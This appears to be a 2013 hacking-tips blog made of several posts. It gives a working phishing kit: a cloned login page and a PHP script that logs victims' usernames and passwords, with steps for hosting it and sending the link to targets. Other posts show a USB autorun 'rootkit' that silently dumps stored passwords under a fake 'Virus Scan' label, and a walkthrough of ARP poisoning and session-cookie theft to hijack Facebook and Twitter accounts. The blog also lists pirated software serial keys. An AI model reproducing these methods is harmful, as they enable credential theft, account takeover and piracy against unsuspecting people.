Saturday 27 April 2013

How to Make a Phisher/Fake Website for any Page


          I received many Emails from my blog readers requesting me to make Fake /Phisher page for various websites like orkut ,twitter , GMail , Face book ...etc .I have already written some tutorials  on how to hack Face book GMail using a fake/phishing page . But many had doubts , problems . To clear all your doubts today i am writing  a tutorial on how you can create a fake/phisher page for any website that you want  Follow the steps given below to create your own phishing page

1. First open the website in a browser for which you want to create a phishing page . Now right click  in an empty space and select view source , copy all the contents to a note pad and save it as something.html 
example :
              orkut.html
2. Now open Yahoo.html (something.html) in a notepad .Now search for the string 

"action = https.." and change the address to login.php and change method = " Post" to "GET" Finally save it 

3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php

<?php
header ('Location: http://orkut.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Note :- By default the victim will be redirected to orkut.com once he clicks login ,If you want you can change the address, you can do it  by changing the www.orkut.com to any  address you desire

4.Now create an account in Free web hosting sites, which supports php like , T35.com or 000webhost.com 

5. Now upload all the two files which we created orkut.html , login.php  

6. Now send the  Orkut.html link to the victim , once  he enters the information and logins in , He will be redirected to the website which we did in step three


7. Now to see the victims password login to your hosting account, there you 'll see new  file log.txt , open it to see the victims user-id and password  

How to Make Your own Computer Into a Web Server


             Web server can refer to either a hardware or a software (of a computer) that helps to deliver content that can be accessed through the Internet.The most common use of web servers is to host web sites but there are other uses like data storage or for running enterprise applications. 
                      Before getting into the actual process, let's look at a couple of real-world situations that explain why you may want to turn your home computer into a web server

Situation 1. Say you have music MP3s, documents and other important files on the hard drive of your home computer. If you turn this home computer into a web server, you will be able to access all these files from office or any other Internet connected machine including your mobile phone.
Situation 2. You have some personal photographs that you want to share with other family members. You can either upload these pictures online to a site like Flickr or better still, just convert the computer into a web server. Now you can connect the camera to the computer, transfer the digital pictures to some designated folder and they'll instantly become available to your friends and family anywhere in the world.
Situation 3. You want to host a website on the internet but the web hosting jargon like FTP, DNS, etc. is way too complex for you. The workaround therefore is that you setup a web server on your home computer (it's easy) and then host a website in seconds without spending a single penny on external web hosting services.Now if any of the above reasons look convincing enough, here's how you can convert your Windows Machine Into a Web server 

Things You Need 

1. Xampp -XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start.

You can Download Xampp From Here 

  

How to Hack Any Passwords in system Using An USB Drive

     Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOLWindows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE ,chrome and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pen drive you can create your own root kit to sniff /hack passwords from any computer.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.


Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…


IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

ChromePass : It is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them into text/html/xml file or copy them to the clipboard. 

I have uploaded all  the Hacking tools in a single package click on the download button to download all the tools and to get the password click Here 

1. After downloading  all the tools, from the above link extract and copy all the executable(.exe files) which is inside the "USB pass hack" folder  into your USB- Pendrive.

2. Now open a Notepad and write the following text into it

[autorun]
open=launch.bat

ACTION= Perform a Virus Scan


save the Notepad and rename it from New Text Document.txt to autorun.inf ,Now copy the autorun.inf file onto your USB pen drive.


3. Now open an another Notepad and copy  the following text onto it.


start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

start ChromePass.exe /stext chrome.txt

Now save the file as launch.bat ,Copy the launch.bat file also to your USB drive.Now your rootkit is ready and you are all set to sniff /hack the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow the steps given below

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. as  shown ,open the files to view the stored passwords

This hack works on Windows 2000, XP, Vista and Windows 7


                                NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Hack Facebook / Twitter Accounts


                 In this tutorial i will explain how you can hack a Facebook/twitter accounts by stealing cookies. This method works only when the victims computer is in a LAN (local area network ).Best place to try out this is in schools ,collages ,cafes . where computers are connected in LAN .Before i proceed let me first explain "cookies "

WHAT ARE COOKIES ? WHAT IS THE USE OF STEALING COOKIES?
                      Cookies are small files that stored on users computer by websites when a user visits them. The stored Cookies are used by the web server to identify and authenticate  the user .For example when a user login in Facebook a unique string is generated and one copy of it  is saved on the server and other is saved on the users browser as Cookies. Both are matched every time the user does any thing in his account So if we steal the victims cookie and inject them  in our browser we will be able to imitate the victims identity to the web server and thus we will be able to log in is his account . This is called as Side jacking .The best thing about this is that  we need not no the victims id or password all we need is the victims cookie
Things we  need :-
1. Ettercap or Cain and able for ARP poisoning the victim
2. Wire shark for sniffing and stealing cookies
3. Firefox browser and Cookie logger add on for injecting the stolen cookies in our browser
Procedure :-
1. First ARP poison the victim .For this you can refer my previous articles on how to ARP poison the victims computer using Cain and able or Ettercap
2. After ARP poisoning open Wire shark ,click capture button from the menu bar , then select interface .Now select your interface (usually eth0 ) finally click start capture .
3. Now you can see the packets being captured , wait for a while till the victim logs in his account( Facebook /twitter )
4. Mean while Find the IP address of Facebook ,for this you can open  CMD (command prompt ) and enter .Ping Facebook.com to find its IP address
5. Now filter the packets by entering the the IP address (Facebook) in the filter bar and click apply

6. Now Locate HTTP Get /home.php  and copy all the cookie names and values in a note pad as shown
7. Now open Firefox and open add and edit cookies ,which we downloaded earlier , add all the cookie values and save them as shown
 8. Now open Facebook in a new tab , you will be logged in the victims account .

                       Thatz it .you have hacked the victims Facebook account by stealing cookies , You can also follow the same steps to hack  Twitter accounts
                                               - If you have any doubts please feel  free to post a comment

Wednesday 24 April 2013

INTERNET DOWNLOAD MANAGER (IDM) 6.12.23 SERIAL KEY

Just Follow These Simple Steps::
Disable your internet.
Try one of the given serial key.
After that enable the internet.
enjoy!


Serial Keys: 
D91GM-T5X1J-DW7YG-1GHIS
I23LZ-H5C2I-QYWRT-RZ2BO
8XJTJ-ZTWES-CIQNV-9ZR2C
PAQ34-MHDIA-1DZUU-H4DB8
4CSYW-3ZMWW-PRRLK-WMRAB
DDLFR-JKN5K-B4DE3-H2WYO
9RVII-F3W58-6FAYV-WPTFD
M7CQ2-VARGX-QFYGZ-URKG0
POOUS-S8V4C-1RXUH-HG6NQ
7JPTJ-4XLY3-HM4LK-9UP4Q
OJNGE-77NS5-MW5FC-MFB7A
HSIWU-KRQQQ-Y870K-YI6QQ
HF0I6-AYL1O-BHDI7-DG9LW
LC3OG-66OU3-38BTX-SX20M
52OGI-AKRTG-MT6YU-YZ7OU
WNJ39-J1JN0-JKNVS-BZSCB

Sunday 21 April 2013

HACKING pool live tour

-Now Open cheat engine
-click to pc icon and select second flash player plugin.exe
-change value type to double
-search 0.900
-select all and click to red mouse icon
-select all and press enter for change value to 1.5
-now play game

HOW TO UNLOCK MEMORY CARD PASSWORD !!


  1.  Insert the Micro SD card into your card reader on your computer. Right-click your Start button and then     click Explore. Find the Micro SD card, it will be listed as a removable disk.
  2.  Click on the micro SD card and files appear on the right. Locate the file MMCSTORE and then choose Copy.
  3. Click directly on your desktop, then click Paste. This will move the MMCSTORE file on the desktop, so you have edit access.
  4. Right-Click on the MMCSTORE then click Open With. Open the file with Notepad.
  5. Read the text for the password. It will be in plain text.
  6.  Remove the SD card from the computer and insert it into the device, which it used as a warehouse. Turn on the phone/camera. When it asks for a password, enter it.

Monday 15 April 2013

Hello everyone! Today I just found this free host with:

Hello everyone! 
Today I just found this free host with:

- 1500 MB of Disk Space
- 100 GB Bandwidth
- Your own domain hosting
- cPanel Control panel
- Website Builder
- Over 500 website templates ready for download
- Free POP3 Email Box and Webmail access
- FTP and Web based File Manager 
- PHP, MySQL, Perl, CGI, Ruby. 
- No Ads at all !

Check it out Here: http://www.000webhost.com/688873.html

Friday 12 April 2013

[TUTORIAL] HACKING IPHONE GAMES AND OTHER STUFF




if we already know something about programming that will not be difficult.. so we must keep in mind that the path to hack the game is this:


/var/mobile/applications/name of App/library/preferenses/Com.namenamename.plist <<<------ always the file that has no blue letters

We clicks the file and find something like HTML files. but not is HTML files but is XML idk ¬¬
thats right so this can be seen sometimes like this

OMG pirates
**TIPS** 
1.-sometimes the values of 0 and 1 mean 0 = no, 1 = yes
2.- sometimes... indicate the value of what we have as the key that indicates the money, like
<key>money</key>
<integer>1999(money)</integer> 

3.-always!! start with <key> and end with </key> look the /
4.- save it after editing

example: (this is a code plist of the game OMG pirates)

<plist version 1.0>
<dict>
<key>attackpower</key>
<integer>10</integer> change to: <integer>999999</integer> and you will get attack of 999999
<key>level</key> <<---- if you get level this return to original configurations
<integer>4</integer>
<key>cheatunlock</key> (yes = 1 or no = 0)
<integer>0</integer>
<key>gamespeed</key> warning!!
<integer>1</integer>
<key>unstopable</key>
<integer>0</key>
<key>money</key>
<integer>189</integer>
<key>HP</key>
<integer>1000</integer> <<-------
<key>maxhp</key> here must match values clearly do not match may not start application
<integer>1000</integer> <<-------
</dict>


this is really easy but you have to be careful with the <> what's interesting here is that not only this you can use to alter living or games for more cash to money but to sell you themselves and you can easily obtain this. intervals of time jumping and other things. 

HACK IPOD ,IPHONE GAMES QUICK AND EASY


Hey am going to show you how to Hack a lot of IPod Iphone games quicksand easy.
First you need to have a jailbroken iDevice.
And you need the essentials like.. cydia or Icy..
Ok so lets start with how to get free Games:
Just go on cydia go to source>> add source and type in
Then go down to Installers 4
------------
Now for the game hacks:
PvZ:
Video:
Text tut:
Make sure you are paused in a game:
and then Go to cydia > sources > Add source and add
Then download sun patch, then start up PvZ and you should have around 80k and 9999 sun
--------------
Hack Zombie Farm:
YOU NEED IFILE FOR THIS!!
Text tut:
1.open ifile
2.Hit the home button
3.Try to find zombie farm, its going to be named with letters and numbers.
3.When you find zombiefarm.apps click on it.
4.Scroll down until you see market.plist then click on it.
5.When you see the item under where it says cost and it shows the number. edit it
6.replace the number with a negative number.
7.Look real good and when it says xp and the number 1 under, change it.
8.make it a postive number but really high like 900.
9. when your done click the done and then save on the top right corner.
10.Hit the home button then open the zombiefarm game and look for where you made it negative like i did with the onion.
11.Plant it and it will freeze giving all the xp (depending on how much you put in like 900) and you hit the max level.
--------------

Hack FallDown:

1.Go to iFile
2.Find fall down directory
3.go to documents
4.click second file down
5.Open it in text file
6.And edit highscore
7.Then go save , go back and click the 3rd one down (Open in text doc again)
8.And edit your name
9.Save and exit
----------------

Hack Mega Jump:
Text tut:
ADD THIS SOURCE:sinfuliphonerepo.com IN CYDIA!
Then go to ifile and go to /user/applications/megajump/library/preferences/
and edit the plist there.
-----------
Hack Doodle jump:
Text Tut:
1.Go to ifile.
2.Go to applications
3.Find doodle jump
4.click library
5.Preferences.
6.Click bottom one.
7.Scroll down and find highscores
8.Then click edit and edit them. 

Creds -sox- 

Monday 8 April 2013

HOW TO CRACK PASSWORD OF RAR FILE


Sometimes when you download any zip file like .rar file from internet, when you try to extract  enquire password to open that file, So that time you are unable to open that important file.  After so many search i found one very nice tool to crack password of any .rar file.RAR Password cracker is the tool used to crack password of .rar file, as it is free but it provide full feature for small duration validity. Click here to download. use of this software you can easily crack password of .rar files.

HYDERABAD VIEWERS (AIRTEL BROADBAND PLANS WITH 40 MPBS SPEED IN HYDERABAD)


Airtel is one of the best network in Indian networks because of network coverage in all rural and urban areas, voice clarity with out call disconnect while talking, internet connectivity speed also very high with different plans. Airtel telecom think and started the new services to the Airtel data users, who want to access high speed data usage with 40MBPS in Hyderabad internet data users choose from the below internet packs These packs not only offering internet data also giving free voice calls.
 First plan: Ultra sonic 3299
The above plan offers as 100GB data usage with speed of 40MBPS and 1000 local minutes This plan totally cost as Rs.3299.
Second plan: Ultrasonic 3999
The above plan offers as 200GB data usage with speed of 40MBPS and 2000 local minutes this plan cost just only Rs.3999
Note:-  Customers can buy Beetle’s VDSL wi-fi modem priced at Rs.3,099 to avail this 40MBPS speed along with wifi connectivity.
Airtel not only offering data and voice calls services and also giving free VAS services on AIrtel like parallel ringing, Unlimited games through on demand, Learn Next- The smartest way to learn maths and science, Free Antivirus for secure PC.
Kindly share this trick with your friends by using below sharing options as well as say thanks and subscribe us

Upload sites for earn money


I found new trick today earn  money with image and video uploads  by using this staree site. Only you have to do simple things upload image or video through mobile or using Computer or laptop and etc android Smartphone devices.When you upload into online completed there shows upload to face book then click on upload to facebook. The uploaded image or video use anywhere on twitter other social networking sites, blogs and forums etc..
How can I earn money?
Your uploaded image or video whenever your friends or anyone of internet users click on image or video you get money from the advertiser. Sexual content prohibited because of you are registered with the use of face book or twitter only there shows your username and your email address but earning is more compared to other upload sites. Advantage of using this upload site you can share your images in social networking sites.
                          รจ    Signup here
How to register into stare
This registration procedure before only available to celebrities and few people only but now it is available to register all people in all states and earn money in dollars
Staree legit or scam
IZEA is one of the trusted communities, so need not worry whether it is legit or scam. Its 100% legit. I just started with staree and saw that it has very good potential to earn few bucks online for just what we normally do on Face book and Twitter.

If you enjoyed reading my post don’t forget to subscribe us

Tags: Upload sites 2013, top uploading sites, image upload sites, video upload sites, earn money with uploading websites, upload and earn

UPLOAD FILES AND EARN MONEY


Upload files and earn money

                          Hai friends Today am come with interesting trick to earn high amount of money by uploading Videos, Audios, Softwares, Data files, Documents, Images whatever you have that files are downloaded by user one download gives you 1dollar 1000 downloads gives you 1000 dollars its amazing. Depending upon your hardwork you get how much money as u want you get through this trick.
                     Mainly now a days many students are study completed and searching for job until that tthey don’t waste their time they have much more knowledge so they utilize their knowledge and gain money in dollars this is very helpful to all.
Not only earn money with uploading after downloading you can refer your friends then u will get some % amount of money they have earned will be credited to your wallet until lifelong.
Now I explains about this sites
FileFlare
                          FileFlare pays an average of $1.00 for each download or more, unlike other websites, Fileflare takes a very small percent commission from their users. Fileflare recently added surveys section in this  Sections Some surveys gives 1 to upto 10$ payout .More options are available for earn money in this fileflare Any options u can put to the download file while downloading file that users can complete the procedure next download the file after verified your amount is credited in your wallet no late instant credit.

                   The minimum payout is as low as 20$ which can be gained easily using their High payout Surveys FileFlare is famous because of its Viral Downloads which is more reliable compared to other
                             If a user is not thinking to complete a Survey then he can Invite his Friends from Facebook or other social networking sites  to Download the FileFlare more Popular is You can Check which Surveys are paying highest According to Country You can get easily Approved into Fileflare. The payout is Minimum 20$ Via PayPal or Wire Transfer only for Some countries.

EARN ONLINE INCOME WITH BLOG

               Fresher Graduates make part time online profit through fileice until they got the job. Now  a days in the challenging environment the jobs are less in the companies and job seekers are high. Hard work is important to get the job but no hard work is needed to make online money. Today am introduce a new trick that PPD means pay per download site which gives an average of 1 dollar per download. The best compared to other online PPD sites. This PPD site US traffic gives an unbeatable average of 0.20 EPC with conversion rates exceeding 25%.

How can I earn money with FileICe.net

     After Successfully uploading a file into fileice. Add some surveys in the survey manager with different countries and different surveys you allocate to your files when a user want to download file through your fileice link when download appears before survey dialogue shows when survey completed download page landed now user download the files when completed in your r account money added in dollars

           If you not have website then use your links at social networking sites like facebook, twitter, etc… main in orums gives you high downloads, more profit high downloads gives high revenue in a day.

           Another way to earn money if you not having website shows filesize an description and offers normal and premium downloads.

Approving by fileice

  Approving of your application is very strictly and limit

   Write about your website how you earn money with our fileice in short description about 200-300 words minimum asked by fileice  If you not having website then how to earn money with fileice. Answer with use of your knowledge for approving.

       Fileice registrations are now opened. registrations are limited don't like register and enjoy high earning money platform after approving your account by fileice.

Some precautions while Registering into fileice

  •     Don’t do spam activities
  •   Don’t complete survey your own. 
  •    Upload legal content only  porn content not activities lead to ban IP.
 
Note:- Fileice is LLC company. Fileice approving of your application take 24-72 hours if not get approved within 3 working days please contact fileice by click on contact option.
Follow the Ideas of approving fileice tricks you successfully accepted into program

iPhone 5 unlock is achieved

           There is nothing physical about unlock even though it connotes an image of a lock being opened. However, there are some infamou...